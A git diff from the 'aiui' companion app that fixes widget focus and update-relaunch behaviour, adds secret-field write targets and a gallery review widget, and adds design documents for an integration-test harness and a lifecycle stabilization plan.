@@ -93,5 +93,10 @@ export async function checkForUpdates(opts: { silent?: boolean } = {}): Promise<
   } catch (e) {
     console.debug(`[aiui] clear_pending_update failed (continuing): ${e}`);
   }
+  // Invariant I1: the host's ExitRequested gate default-denies every
+  // Tauri-initiated exit. `relaunch()` fires ExitRequested, so we must latch
+  // the exit authority first (case (c), update-restart) or the relaunch would
+  // be vetoed and the freshly-installed update would never take effect.
+  await invoke("authorize_exit_for_update");
   await relaunch();
 }
diff --git a/companion/src/lib/widgets/Ask.svelte b/companion/src/lib/widgets/Ask.svelte
index 15fce4f..9ac1ff7 100644
--- a/companion/src/lib/widgets/Ask.svelte
+++ b/companion/src/lib/widgets/Ask.svelte
@@ -74,25 +74,25 @@
     {/each}
 
     {#if spec.allowOther ?? true}
-      <button
-        type="button"
-        class="option"
-        class:selected={otherActive}
-        onclick={toggleOther}
-      >
+      <!-- The text field is a SIBLING of the toggle, never nested inside a
+           <button>. Nesting an <input> in a <button> made WebKit treat the
+           Space key as button-activation, which flipped `otherActive` off,
+           destroyed the field and stole focus on every space typed. -->
+      <div class="option" class:selected={otherActive}>
         <div style="flex: 1;">
-          <div class="label">{$_("dialog.other_answer")}</div>
+          <button type="button" class="other-toggle" onclick={toggleOther}>
+            <div class="label">{$_("dialog.other_answer")}</div>
+          </button>
           {#if otherActive}
             <input
               type="text"
               placeholder={$_("dialog.other_placeholder")}
               bind:value={other}
               style="margin-top: 6px;"
-              onclick={(e) => e.stopPropagation()}
             />
           {/if}
         </div>
-      </button>
+      </div>
     {/if}
   </div>
 
@@ -103,3 +103,21 @@
     <button class="primary" disabled={!canSubmit} onclick={submit}>{$_("dialog.submit")}</button>
   </footer>
 </main>
+
+<style>
+  /* The "other answer" label is a plain toggle button so the text field can
+     sit beside it (not inside it). Visual is carried by the surrounding
+     `.option` card; the button itself is invisible. */
+  .other-toggle {
+    display: block;
+    width: 100%;
+    text-align: left;
+    background: none;
+    border: none;
+    padding: 0;
+    margin: 0;
+    font: inherit;
+    color: inherit;
+    cursor: pointer;
+  }
+</style>
diff --git a/companion/src/lib/widgets/Form.svelte b/companion/src/lib/widgets/Form.svelte
index 77a1b79..9d31574 100644
--- a/companion/src/lib/widgets/Form.svelte
+++ b/companion/src/lib/widgets/Form.svelte
@@ -38,10 +38,24 @@
     values: Record<string, string | number | null>;
   };
 
+  // Issue #135: optional per-field file-write target. Orthogonal to the field
+  // kind. On affirmative submit aiui writes the entered value to this path on
+  // the agent's host; for a `secret` field the value is written-only (never
+  // returned). The actual write + destination resolution happen Rust-side
+  // (DialogShell → write_dialog_targets); here it only drives the inline note.
+  type WriteTarget = {
+    mode: "create" | "substitute";
+    path: string;
+    perm?: string;
+    overwrite?: boolean;
+    placeholder?: string;
+  };
+
   type Field =
-    | { kind: "text"; name: string; label: string; placeholder?: string; default?: string; multiline?: boolean; required?: boolean }
-    | { kind: "password"; name: string; label: string; placeholder?: string; required?: boolean }
-    | { kind: "number"; name: string; label: string; default?: number; min?: number; max?: number; step?: number; required?: boolean }
+    | { kind: "text"; name: string; label: string; placeholder?: string; default?: string; multiline?: boolean; required?: boolean; target?: WriteTarget }
+    | { kind: "password"; name: string; label: string; placeholder?: string; required?: boolean; target?: WriteTarget }
+    | { kind: "secret"; name: string; label: string; placeholder?: string; required?: boolean; target?: WriteTarget }
+    | { kind: "number"; name: string; label: string; default?: number; min?: number; max?: number; step?: number; required?: boolean; target?: WriteTarget }
     | { kind: "select"; name: string; label: string; options: SelectOption[]; default?: string; required?: boolean }
     | { kind: "checkbox"; name: string; label: string; default?: boolean }
     | { kind: "slider"; name: string; label: string; min: number; max: number; step?: number; default?: number }
@@ -649,6 +663,8 @@
             {/if}
           {:else if f.kind === "password"}
             <input type="password" placeholder={f.placeholder ?? ""} bind:value={values[f.name]} autocomplete="off" />
+          {:else if f.kind === "secret"}
+            <input type="password" placeholder={f.placeholder ?? ""} bind:value={values[f.name]} autocomplete="off" spellcheck="false" />
           {:else if f.kind === "number"}
             <input type="number" min={f.min} max={f.max} step={f.step ?? 1} bind:value={values[f.name]} />
           {:else if f.kind === "select"}
@@ -684,6 +700,20 @@
               <code>{values[f.name]}</code>
             </div>
           {/if}
+          {#if "target" in f && f.target}
+            <!-- Issue #135: show the user *where* this value will be written
+                 before they approve by submitting. The affirmative button IS
+                 the per-operation approval. -->
+            <p class="write-target">
+              <span class="wt-icon" aria-hidden="true">↳</span>
+              {f.kind === "secret" ? "Wird geschrieben (nicht an den Agent zurück):" : "Wird zusätzlich geschrieben:"}
+              <code>{f.target.path}</code>
+              <span class="wt-meta"
+                >mode: {f.target.mode}{f.target.perm ? `, ${f.target.perm}` : ""}{f.target.overwrite
+                  ? ", overwrite"
+                  : ""}</span>
+            </p>
+          {/if}
         </div>
       {/if}
     {/each}
@@ -724,6 +754,21 @@
   .static-text.info { color: var(--fg); }
   .static-text.warn { border-color: #f59e0b; background: color-mix(in srgb, #f59e0b 10%, var(--surface)); }
   .static-text.muted { color: var(--muted); font-size: 12px; }
+  .write-target {
+    margin: 4px 0 0;
+    font-size: 12px;
+    color: var(--muted);
+    display: flex;
+    flex-wrap: wrap;
+    align-items: baseline;
+    gap: 4px 6px;
+  }
+  .write-target code {
+    font-size: 11px;
+    word-break: break-all;
+  }
+  .write-target .wt-icon { color: var(--accent); }
+  .write-target .wt-meta { color: var(--muted); opacity: 0.8; }
 
   /* --- markdown --- */
   .markdown-field {
diff --git a/companion/src/lib/widgets/Gallery.svelte b/companion/src/lib/widgets/Gallery.svelte
new file mode 100644
index 0000000..790c4c7
--- /dev/null
+++ b/companion/src/lib/widgets/Gallery.svelte
@@ -0,0 +1,209 @@
+<script lang="ts">
+  import { _ } from "svelte-i18n";
+
+  type Action = {
+    label: string;
+    value: string;
+    primary?: boolean;
+    success?: boolean;
+    destructive?: boolean;
+  };
+  type Item = {
+    value: string; // stable id returned in the result
+    src?: string; // image (data:/http/local→data) or video (data:/http; local video lands with the scp-transfer increment)
+    alt?: string;
+    label?: string;
+    detail?: string; // short context shown beside the thumbnail
+    max_height?: number;
+  };
+  type Spec = {
+    kind: "gallery";
+    title?: string;
+    description?: string;
+    header?: string;
+    items: Item[];
+    actions?: Action[]; // per-item decision buttons; default Approve / Revise / Skip
+    comment?: boolean; // show a per-item comment field
+    columns?: number; // grid columns; default responsive auto-fill
+    submitLabel?: string;
+    cancelLabel?: string;
+  };
+
+  let { spec, onsubmit, oncancel }: { spec: Spec; onsubmit: (r: any) => void; oncancel: () => void } =
+    $props();
+
+  const DEFAULT_ACTIONS: Action[] = [
+    { label: "Approve", value: "approve", success: true },
+    { label: "Revise", value: "revise" },
+    { label: "Skip", value: "skip" },
+  ];
+  const actions = $derived(spec.actions && spec.actions.length ? spec.actions : DEFAULT_ACTIONS);
+
+  // Per-item decision + comment, keyed by item value.
+  let decisions = $state<Record<string, string>>({});
+  let comments = $state<Record<string, string>>({});
+
+  function pick(itemValue: string, actionValue: string) {
+    // Toggle off if the same action is clicked again.
+    decisions = { ...decisions, [itemValue]: decisions[itemValue] === actionValue ? "" : actionValue };
+  }
+
+  const decidedCount = $derived(Object.values(decisions).filter(Boolean).length);
+
+  function isVideo(src: string | undefined): boolean {
+    if (!src) return false;
+    if (src.startsWith("data:video/")) return true;
+    return /\.(mp4|mov|m4v|webm)(\?|#|$)/i.test(src);
+  }
+
+  function submit() {
+    const out: Record<string, { decision: string; comment?: string }> = {};
+    for (const it of spec.items) {
+      const decision = decisions[it.value] || "";
+      const comment = (comments[it.value] || "").trim();
+      if (decision || comment) {
+        out[it.value] = comment ? { decision, comment } : { decision };
+      }
+    }
+    onsubmit({ decisions: out });
+  }
+
+  const cols = $derived(spec.columns && spec.columns > 0 ? spec.columns : 0);
+</script>
+
+<main class="window-shell">
+  <div class="window-scroll">
+    {#if spec.header}<span class="chip">{spec.header}</span>{/if}
+    {#if spec.title}<p class="title">{spec.title}</p>{/if}
+    {#if spec.description}<p class="subtitle">{spec.description}</p>{/if}
+
+    <div
+      class="gallery-grid"
+      style={cols
+        ? `grid-template-columns: repeat(${cols}, minmax(0, 1fr));`
+        : "grid-template-columns: repeat(auto-fill, minmax(220px, 1fr));"}
+    >
+      {#each spec.items as item (item.value)}
+        <div class="gallery-item" class:decided={!!decisions[item.value]}>
+          {#if item.src}
+            <div class="gallery-thumb" style={item.max_height ? `max-height:${item.max_height}px` : ""}>
+              {#if isVideo(item.src)}
+                <!-- svelte-ignore a11y_media_has_caption -->
+                <video src={item.src} controls preload="metadata"></video>
+              {:else}
+                <img src={item.src} alt={item.alt ?? item.label ?? item.value} />
+              {/if}
+            </div>
+          {/if}
+          {#if item.label}<div class="gallery-label">{item.label}</div>{/if}
+          {#if item.detail}<div class="gallery-detail">{item.detail}</div>{/if}
+
+          <div class="gallery-actions">
+            {#each actions as a (a.value)}
+              <button
+                type="button"
+                class="ga-btn"
+                class:selected={decisions[item.value] === a.value}
+                class:success={a.success}
+                class:danger={a.destructive}
+                class:primary={a.primary}
+                onclick={() => pick(item.value, a.value)}
+              >{a.label}</button>
+            {/each}
+          </div>
+
+          {#if spec.comment}
+            <input
+              type="text"
+              class="gallery-comment"
+              placeholder={$_("dialog.gallery.comment_placeholder")}
+              bind:value={comments[item.value]}
+            />
+          {/if}
+        </div>
+      {/each}
+    </div>
+  </div>
+
+  <footer class="window-footer">
+    <span class="gallery-count">{$_("dialog.gallery.decided", { values: { n: decidedCount, total: spec.items.length } })}</span>
+    <button onclick={oncancel}>{spec.cancelLabel ?? $_("dialog.cancel")}</button>
+    <button class="primary" onclick={submit}>{spec.submitLabel ?? $_("dialog.submit")}</button>
+  </footer>
+</main>
+
+<style>
+  .gallery-grid {
+    display: grid;
+    gap: 12px;
+    margin-top: 8px;
+  }
+  .gallery-item {
+    display: flex;
+    flex-direction: column;
+    gap: 6px;
+    padding: 8px;
+    border: 1px solid var(--border);
+    border-radius: 8px;
+    background: var(--surface-raised, var(--surface));
+    box-shadow: var(--shadow-sm);
+    transition: border-color 0.12s ease;
+  }
+  .gallery-item.decided {
+    border-color: var(--accent);
+  }
+  .gallery-thumb {
+    display: flex;
+    justify-content: center;
+    align-items: center;
+    overflow: hidden;
+    border-radius: 6px;
+    background: var(--surface);
+    max-height: 200px;
+  }
+  .gallery-thumb img,
+  .gallery-thumb video {
+    max-width: 100%;
+    max-height: 200px;
+    height: auto;
+    object-fit: contain;
+  }
+  .gallery-label {
+    font-weight: 600;
+    font-size: 13px;
+  }
+  .gallery-detail {
+    font-size: 12px;
+    color: var(--fg-muted, color-mix(in srgb, var(--fg) 62%, var(--bg)));
+    white-space: pre-wrap;
+  }
+  .gallery-actions {
+    display: flex;
+    flex-wrap: wrap;
+    gap: 6px;
+    margin-top: auto;
+  }
+  .ga-btn {
+    flex: 1 1 auto;
+    padding: 4px 8px;
+    font-size: 12px;
+    border: 1px solid var(--border);
+    border-radius: 6px;
+    background: var(--surface);
+    cursor: pointer;
+  }
+  .ga-btn.selected {
+    border-color: var(--accent);
+    background: color-mix(in srgb, var(--accent) 18%, var(--bg));
+    font-weight: 600;
+  }
+  .gallery-comment {
+    width: 100%;
+    margin-top: 2px;
+  }
+  .gallery-count {
+    flex: 1 1 auto;
+    font-size: 12px;
+    color: var(--fg-muted, color-mix(in srgb, var(--fg) 55%, var(--bg)));
+  }
+</style>
diff --git a/docs/architecture/integration-harness.md b/docs/architecture/integration-harness.md
new file mode 100644
index 0000000..021820d
--- /dev/null
+++ b/docs/architecture/integration-harness.md
@@ -0,0 +1,116 @@
+# aiui remote-path integration harness
+
+The bugs that made aiui whack-a-mole (409-storm, stranded empty windows,
+ReadError, host dying after submit) all lived in the **timing / integration
+layer** — the live interplay of companion ⟷ tunnel ⟷ bridge ⟷ dialog
+lifecycle. Pure-function unit tests can't reach that layer, which is exactly
+why it stayed unprotected. This harness drives the **real** chain and asserts
+its behaviour, so that class of regression is caught before a release instead
+of by the user.
+
+Key fact established 2026-05-30: a Claude Code session running on the remote
+can reach the real companion's HTTP API over the existing reverse tunnel
+(`localhost:7777` + the pushed token). So the harness driver runs **from the
+remote**, against a **real** companion on the Mac — not a simulated one.
+
+## Stufe 1 — read-only smoke (DONE)
+
+`python/tests/test_integration_live.py`. Runs from the remote against the live
+companion. Strictly read-only (`/ping`, `/health`, `/version`, `/probe`,
+401-on-bad-token, `GET /render/{id}` unknown-id) → **no dialog windows pop**.
+
+- Opt-in via `AIUI_LIVE=1`; the normal `pytest` run and CI skip it (no network).
+- Skips with a message if no companion is reachable.
+- Version-tolerant: `wire_version` and the async `GET /render/{id}` route are
+  checked only if present, so it also passes against an older installed release.
+
+```
+AIUI_LIVE=1 uv run --extra dev pytest tests/test_integration_live.py -v
+```
+
+Verified 2026-05-30: 6 passed against the installed companion (v0.4.45) over
+the tunnel.
+
+## Stufe 2 — render path + window lifecycle (DESIGN)
+
+This is where the actual bugs lived. To exercise it automatically we must (a)
+complete a render→answer→teardown cycle without a human, (b) observe window
+state, and (c) NOT spam the user's screen with real dialogs.
+
+There is deliberately **no** HTTP endpoint to answer a dialog in production (it
+would be a UX/security hole). So Stufe 2 needs a small, strictly test-gated
+hook in the companion — the "test counterpart":
+
+### Companion test mode (preferred)
+
+Active only when launched with `AIUI_TEST_MODE=1` **and** authenticated with the
+token. Absent from normal runs — the routes 404 when the env is unset, so it
+can never be reached in production. It adds:
+
+- `POST /test/answer/{id}` — resolve a pending dialog by id with a canned
+  `submit{result}` or `cancel`, exactly as the frontend would. Lets the driver
+  complete the cycle with no UI automation and no human.
+- Test-mode renders the dialog window **hidden / off-screen** (or suppress the
+  window entirely, registry-only) so a test sweep doesn't flash dialogs at the
+  user.
+- `/health` (or a `/test/windows`) reports the **dialog-window labels** so the
+  driver can assert "one window per render, torn down after terminal".
+
+### Driver scenarios (pytest, `AIUI_LIVE=1` + companion in test mode)
+
+Mirrors the spec's required scenarios:
+
+- **async render**: `POST /render` (`x-aiui-async`) → 202 `{id}`; `GET
+  /render/{id}` → `{pending}`; `POST /test/answer/{id}` → `GET` returns the
+  terminal result; assert the window for `id` is gone.
+- **no-409 / multi-window**: fire two concurrent `POST /render` → assert **both**
+  get 202 `{id}` (single-occupancy gone); assert two distinct windows; answer
+  both; assert both torn down.
+- **cancellation-safety**: start a render, drop the client connection
+  mid-poll → assert the registry slot frees and the window is destroyed (no
+  2 h leak / 409 on the next render).
+- **TTL / channel-drop / Claude-Desktop-quit / restart** — the remaining spec
+  scenarios, each asserting a clean terminal outcome.
+
+### Alternative without a companion change
+
+A Mac-side AppleScript/JXA agent that finds aiui dialog windows, clicks their
+buttons, and reports the window count. Works against an unmodified companion,
+but is timing-fragile, needs Accessibility permission, and can't suppress the
+on-screen flash. The companion test-mode above is cleaner and is the
+recommended path; this stays a fallback.
+
+## Lifecycle-failure runbook (manual, observable via the event log)
+
+Several spec scenarios are inherently stateful and interactive — they kill a
+process or a tunnel *mid-call* — so they can't be read-only pytest cases
+without orchestrating real subprocesses. The v0.8.0 **lifecycle event log**
+(`lifecycle_log`, issue #137) makes them *verifiable by inspection* instead:
+each transition is named, ring-buffered, and dumped to the trace log on exit.
+`/health` reports the current `lifecycle_phase` live.
+
+Run each against a real build, then read `lifecycle_phase` + the trace dump.
+
+| Scenario | Action | Expected event-log signature |
+|---|---|---|
+| Window-X is not exit (I2) | Close the setup window | `window close treated as hide`; phase stays `Serving`; process alive |
+| ⌘Q with Claude Desktop up | Quit aiui via menu while CD runs | `ExitRequested default-denied`; phase stays `Serving` |
+| Last child gone, CD alive | Quit the only Claude Code session | `phase Serving → GracePending`, `grace armed (5s)`, `grace resolved → stay`, `phase GracePending → Serving` |
+| Wirt gone (CD quit) | Quit Claude Desktop | `… → GracePending`, `grace resolved → exit (claude_desktop_running=false)`, `phase → Exiting`, `host exit authorized (claude-desktop-gone)`, `lifecycle-dump …` |
+| Child churn | Restart Claude Desktop quickly | `child detached`/`child attached` around a `grace resolved → stay` (no exit) |
+| Update-authorized exit | Trigger `/update` install | `host exit authorized (exit-authorized-uninstall-or-update)` |
+
+The point is no longer "did it behave?" inferred from whether a window
+lingered — it's the named transition trail, which is exactly the forensic
+record whose absence made the 0.4.x lifecycle a guessing game.
+
+## Preconditions & honest scope
+
+- **To validate *this* PR's code, the v0.5.0 build must run on the Mac.** The
+  driver tests the companion that's installed; against the current release
+  (v0.4.45) Stufe-2 assertions for new behaviour (async, no-409) don't apply.
+- Stufe 2 is a real build (the test-mode hook in the companion + the driver
+  suite). It is **not** wired into ordinary CI, which has no real Mac+remote
+  pair — it's a pre-release check run against a real build, or a dedicated rig.
+- The test-mode hook must be reviewed to confirm it cannot activate in
+  production (env-gated at launch, token-gated, routes absent otherwise).
diff --git a/docs/architecture/stabilization-plan.md b/docs/architecture/stabilization-plan.md
new file mode 100644
index 0000000..3f65bd8
--- /dev/null
+++ b/docs/architecture/stabilization-plan.md
@@ -0,0 +1,388 @@
+# aiui Stabilization Plan (locked spec — guards against drift)
+
+Status: Steps 1–4 implemented (Refs #137, v0.5.0). Step 4's tunnel was settled
+empirically (2026-05-30): aiui-dedicated is correct and already in place — no
+refactor needed; piggyback is impossible (Claude Desktop provides no reverse
+forward). Per-step implementation records are inline under each step.
+
+**Cross-cutting closed (v0.8.0):** (1) the lifecycle state machine + named
+event log landed as `companion/src-tauri/src/lifecycle_log.rs` — explicit
+`Phase` (Starting/Serving/GracePending/Exiting), named `LifecycleEvent`s wired
+at every lifetime decision point, a bounded ring dumped to the trace on exit,
+and the live phase surfaced in `/health`. (2) the remote-path harness: the
+read-only `AIUI_LIVE` smoke suite was extended (lifecycle phase, media route,
+media-auth), and the inherently-interactive failure scenarios (window-X, ⌘Q,
+grace stay, Wirt-gone exit, child churn, update exit) are now a **manual
+runbook keyed on the event-log signatures** (see `integration-harness.md`) —
+the event log is what turns those from "infer from window behaviour" into a
+named, inspectable transition trail. With both done, #137 is complete.
+Origin: root-cause analysis 2026-05-29 (Opus 4.8 code analysis + independent
+Codex diagnosis, convergent; external validation of the three pivotal facts).
+
+The instability is not a bug-swarm but **one architectural fault with many
+symptoms**: aiui fuses three components with different lifecycles into one
+binary whose lifetime hangs on a fragile proxy (count of mcp-stdio children
+attached to a socket + 60 s grace) instead of on the real signal (is the host
+Claude Desktop alive). The remote path additionally lacks the resurrection and
+cold-start retry the local path has.
+
+This plan is measured against the invariants below. Every change either
+establishes an invariant or is out of scope.
+
+## Invariants (the contract)
+
+- **I1 — Host planned-exit ONLY in three cases:** (a) Claude Desktop terminates,
+  (b) aiui is uninstalled, (c) update-restart. *Every other process exit is a
+  crash* — logged as such, never traced as a clean shutdown.
+- **I2 — Window close ≠ process exit.** Red X / ⌘W / "Beenden" on any window =
+  hide window (+ demote to Accessory if no dialog remains). Never `app.exit`.
+- **I3 — Tunnel owner = the Mac (SSH client), always.** Structurally forced:
+  Mac→remote reachability is the precondition of the whole setup; remote→Mac is
+  never guaranteed. The remote bridge is a passive forwarder; only the Mac can
+  establish/repair the tunnel.
+- **I4 — Remote bridge planned-exit ONLY:** stdin-EOF (its Claude Code session
+  ended) or deregistration. *Never* killed from the Mac to force a version.
+- **I5 — Nothing kills a process / tunnel / bridge that may hold an in-flight
+  request.** Graceful drain before any teardown.
+- **I6 — Local and remote bridges have identical resilience semantics**
+  (cold-start poll, async-render polling, progress notifications, error
+  classification, timeouts).
+- **I7 — Every render resolves to exactly one terminal outcome** (kept from
+  current behaviour).
+- **I8 — Multi-window:** N concurrent dialogs allowed; **each window carries a
+  human-legible session identifier** so the user can tell which session a dialog
+  belongs to.
+
+## Step 1 — Host lifetime invariant (decided; highest leverage, lowest risk)
+
+Files: `lifetime.rs`, `lib.rs`.
+
+Single exit authority. Introduce one predicate consulted by every
+exit-candidate path:
+
+    fn host_should_exit(reason) -> bool
+      = explicit_uninstall_or_update  // cases (b)/(c): set by quit_app / updater
+        || !setup::is_claude_desktop_running()  // case (a): the real Wirt signal
+
+- **`lifetime::make_shutdown_watcher` (grace-expired):** keep the *edge* (last
+  child disconnected) but, on that edge, consult `is_claude_desktop_running()`
+  (already exists, `pgrep -f /Applications/Claude.app/`). CD alive → **do not
+  arm grace, do not exit** (CD merely dropped/restarted the aiui MCP server, or
+  Cowork churn). CD gone → short grace (≤5 s) then exit. This reuses an existing
+  edge + an existing helper → **no objc bridge, no continuous poll tick.**
+  - When CD quits it closes its children's stdin → EOF → they exit → disconnect
+    → the edge fires → host exits. The edge therefore *does* fire on the only
+    legitimate "Wirt endet" event.
+  - Optional enhancement (later): an `NSWorkspaceDidTerminateApplication`
+    observer (objc2) for instant detection. Not required for correctness.
+- **Setup-window `CloseRequested` (lib.rs `on_window_event`):** `api.prevent_close()`
+  + `window.hide()` + demote to Accessory. Remove the
+  `setup-close-no-children → app.exit(0)` path entirely.
+- **`RunEvent::ExitRequested` (lib.rs):** **default-deny** — `api.prevent_exit()`
+  for *every* Tauri-initiated exit. Only the explicit paths (quit_app / updater
+  restart) and the watcher's CD-gone exit may terminate. Removes the
+  veto-by-child-count logic.
+- **`LifetimeStats` child counter:** demoted to telemetry (`/health`) + the
+  start-trigger only (`mcp_attach` first attach → `open --auto`). It **never**
+  gates exit again.
+
+No-regression: the grace-exit/idle-exit existed to reap stale state; that is now
+covered by the existing `disk_version_if_stale` self-check + the housekeeping
+sweeps, which stay.
+
+## Step 2 — Remote bridge never killed to force a version (decided)
+
+Files: `setup.rs`, `lib.rs`, `http.rs`, `python/.../server.py`.
+
+- Remove `kill_remote_mcp_stdio` / `pkill -f 'aiui-mcp'` from the GUI-startup
+  remote-pin loop (`lib.rs`) and from `resync_remote` / `add_remote` re-add.
+  Patch the pin in `~/.claude.json`; it takes effect at the **next natural
+  spawn**. A live session keeps its version until it ends.
+- Keep an outbound kill ONLY for true deregistration (`remove_remote` /
+  uninstall), and even there prefer config-removal + natural session end over a
+  broad `pkill`. If a kill is kept, scope it precisely (never blunt `-f
+  aiui-mcp`, which has cross-session blast radius — the remote twin of the
+  0.4.42 Cowork-kill).
+- Cooperative version floor (replaces external enforcement): add `wire_version`
+  to `/version` + `/probe`. The bridge reads it on connect; on a hard
+  incompatibility it returns a **structured tool error** ("incompatible aiui
+  versions — restart this Claude Code session"), never gets killed, never
+  crashes. Tolerate ordinary version skew (the wire contract is versioned and
+  stable).
+
+> **Implemented (2026-05-30, PR #137).** `kill_remote_mcp_stdio`
+> (`ssh … pkill -f 'aiui-mcp'`) and all three of its callers — the GUI-startup
+> remote-pin loop, `add_remote` re-add, and `resync_remote` — are deleted. The
+> pin in `~/.claude.json` now takes effect at the next natural spawn; a live
+> session keeps its version until it ends. `resync_remote` is re-pin-only.
+> Deregistration (`remove_remote` / `uninstall_all`) was already
+> config-removal + tunnel-stop, no kill — left as is. Cooperative floor:
+> `WIRE_VERSION = 1` in `http.rs`, surfaced on `/version` + `/probe`; the
+> Python bridge's `_check_wire_compat` reads it once per process and raises a
+> structured "restart this session" error only on a hard wire mismatch (absent
+> field → treated as v1, transient read errors tolerated). Tests: Rust 105
+> green, Python 21 green (4 new wire-compat). The Rust bridge (`mcp.rs`) is the
+> same binary as the companion, so it needs no floor check.
+
+## Step 3 — Async render + bridge parity (decided; closes the ReadError class)
+
+Files: `http.rs`, `dialog.rs`, `mcp.rs`, `python/.../server.py`.
+
+> **Interim fix already landed (2026-05-30, with the Step-1 PR #137):** the
+> acute 409-storm + stranded-empty-window pair was a *cancellation-safety* hole,
+> not the full async gap. The synchronous `/render` handler parks on
+> `timeout(DIALOG_TTL=2h, result_rx)` while the MCP client gives up far sooner
+> (the local Rust bridge times out at 300 s). On client give-up Axum drops the
+> handler future, and none of the explicit teardown ran → the registry entry
+> leaked for 2 h (409 for every later render) and the surfaced window stranded
+> empty. A `RenderGuard` (RAII) now cancels the entry + destroys the window on
+> *any* drop, including the future-cancelled case. This makes the current
+> handler cancellation-safe; the async-render protocol below still supersedes it
+> (it removes the held connection entirely and is what properly supports long
+> human fills without the client timing out at all).
+
+- **Async `/render` (RFC point #1, never built):** `POST /render` registers the
+  dialog and returns `{id, ttl}` immediately. New `GET /render/{id}` is a
+  bounded long-poll (~25 s) returning `{pending}` or the terminal result.
+  Removes the multi-minute open HTTP connection that any GUI/tunnel blip turns
+  into ReadError.
+- **Both bridges identical:** POST then loop `GET /render/{id}` until terminal
+  or the client gives up; emit `notifications/progress` each iteration.
+- **Python bridge to full parity (I6):**
+  - Add the `wait_for_aiui` cold-start poll (`/ping` up to ~30 s) before
+    posting — mirror the Rust bridge. Replaces the brittle single 3 s preflight.
+  - Add progress notifications (FastMCP progress API — verify exact call).
+  - Switch to the async-render polling loop above.
+  - Classify errors precisely: TCP-refused (tunnel down) vs. connected-but-no-
+    HTTP (= ReadError: tunnel up, Mac down) vs. 401 (token). Today the remote
+    `ConnectError` branch is dead and ReadError gets a misleading message.
+
+> **Implemented (2026-05-30, PR #137) — additive / backward-compatible.** Async
+> render is opt-in via the `x-aiui-async` request header, *not* a replacement of
+> the synchronous long-poll. This keeps the proven local path intact and means
+> old bridges (which never send the header) keep working unchanged, so
+> `WIRE_VERSION` stays 1.
+> - **Companion (`http.rs`):** `POST /render` with the header registers +
+>   surfaces the dialog, hands resolution to a detached task that fills an
+>   `AsyncSlot`, and returns `202 {id, ttl_secs}`. New `GET /render/{id}`
+>   poll-loops (200 ms ticks, bounded by `ASYNC_POLL_WINDOW` = 25 s) returning
+>   the terminal result (drained once) / `{pending:true}` / `404`. Without the
+>   header, the legacy synchronous path runs untouched. Resolution + window
+>   teardown are shared by both via `resolve_dialog`. Resolved-but-uncollected
+>   slots are swept at `DIALOG_TTL`.
+> - **Both bridges (`mcp.rs`, `server.py`):** POST with the header, then loop
+>   `GET /render/{id}` until terminal; each GET is bounded (40 s > server
+>   window) so a blip costs one poll, never a held connection. Both fall back to
+>   the synchronous result if the companion answers 200 instead of 202 (so a new
+>   bridge works against an old companion too).
+> - **Python parity (I6):** added `_wait_for_aiui` (`/ping` cold-start poll,
+>   ~30 s), MCP progress notifications each pending poll (FastMCP
+>   `Context.report_progress`, best-effort), the async polling loop, and an
+>   explicit `httpx.ReadError` branch ("tunnel up, Mac not serving") distinct
+>   from `ConnectError`. The Rust bridge already had cold-start + progress.
+> - Tests: Rust 106 (slot lifecycle), Python 26 (+5: poll terminal/pending/404,
+>   progress tick, cold-start tolerance). Not yet exercised end-to-end against a
+>   live remote — integration harness is still the open cross-cutting item.
+
+## Step 4 — Tunnel mechanism + multi-window (both resolved)
+
+Files: `tunnel.rs`, `setup.rs`, `lib.rs`, `dialog.rs`, `http.rs`, frontend.
+
+### Tunnel — DECISION SETTLED EMPIRICALLY (2026-05-30): aiui-dedicated, no change
+
+The original deciding facts:
+1. Does the SSH connection Claude Desktop opens to the remote carry a
+   `RemoteForward 7777` from `~/.ssh/config`?
+2. Is concurrent multi-session **on the same remote host** a requirement?
+
+> **Measured on the Mac (client side), 2026-05-30 — corrects an earlier wrong
+> inference.** A read-only probe of a live Claude-Desktop Code-tab session
+> found:
+> - **Fact (1) = NO.** Claude Desktop spawns `/usr/bin/ssh` *without* `-R` on
+>   its command line, *without* a custom `-F` config, and `ssh -G <host>`
+>   resolves **no `remoteforward`** for any host — there is no `RemoteForward`
+>   in `~/.ssh/config`. CD does **not** provide a reverse forward.
+> - **Fact (2) = YES** (user, 2026-05-30).
+> - aiui **already** runs the dedicated path: two live
+>   `ssh -N -T -R 7777:localhost:7777 … <host>` processes, parented by
+>   `aiui.app … --auto`, one per registered remote. They work
+>   (`ExitOnForwardFailure=yes` would have killed them on a bind clash).
+>
+> Both facts point to **aiui-dedicated**, which is also **what is already
+> implemented**. **Piggyback is impossible**, not merely unchosen: there is no
+> CD-provided forward to ride. (An earlier note here claimed CD provided the
+> forward and proposed deleting the TunnelManager — that was based on reading
+> the *remote's* aiui config, which is irrelevant: the **Mac** owns the
+> tunnels. Deleting the TunnelManager would have broken all remote dialogs.)
+
+- **aiui-dedicated** is correct and **needs no refactor.** The existing tunnel
+  is already adequately hardened: `ExitOnForwardFailure=yes` (clean bind /
+  collision handling), `ServerAliveInterval=30` + `ServerAliveCountMax=3`
+  (dead-connection detection ≤90 s → ssh exits → reconnect), shared-forward
+  detection (a second aiui / external owner of `:7777`), and the startup
+  orphan-sweep. It needs a non-interactive auth path Mac→remote — satisfied for
+  typical Code-tab users, who reach the remote via the *same* system `ssh` +
+  agent that CD itself uses (measured: `forwardagent no`, `controlmaster
+  false`, no ProxyJump → `BatchMode` succeeds).
+- The spec's *"health = probe `/probe` through the tunnel, not 'ssh alive
+  2 s'"* was written before crediting `ExitOnForwardFailure` + `ServerAlive`,
+  which already make "process alive" a sound health proxy; the original
+  ReadError driver (Mac HTTP not serving) is closed by **Step 1**. Adding a
+  periodic SSH `/probe` loop would be real overhead for marginal gain — a
+  quick-win deliberately **not** taken.
+- The "running both in parallel" collision the plan feared was a hypothesis;
+  the measurement shows only aiui's own `-NTR` and no competing manual
+  `RemoteForward` (aiui strips those on `add_remote` anyway).
+
+### Multi-window (I8)
+
+- Drop single-occupancy: remove `try_register`'s "reject if any pending → 409".
+  Allow N concurrent dialogs (registry already supports `DIALOG_HARD_CAP`).
+- **One window per render**, window label = dialog id (replaces the single
+  reused `DIALOG_WINDOW_LABEL`). Teardown keyed by id.
+- **Session identifier (I8):**
+  - Render spec gains a `session` field (string), set by the caller; tool
+    wrappers (`mcp.rs`, `server.py`) gain a `session` param. Skill + tool
+    descriptions instruct the agent to pass a short human label (project name
+    etc.).
+  - The **remote Python bridge auto-injects its `hostname`** (or the registered
+    alias) as `session_origin`, so the user always sees which host a dialog came
+    from even if the agent passes nothing (the Mac cannot distinguish remotes at
+    `:7777` — all share one port — so origin must come from the caller side).
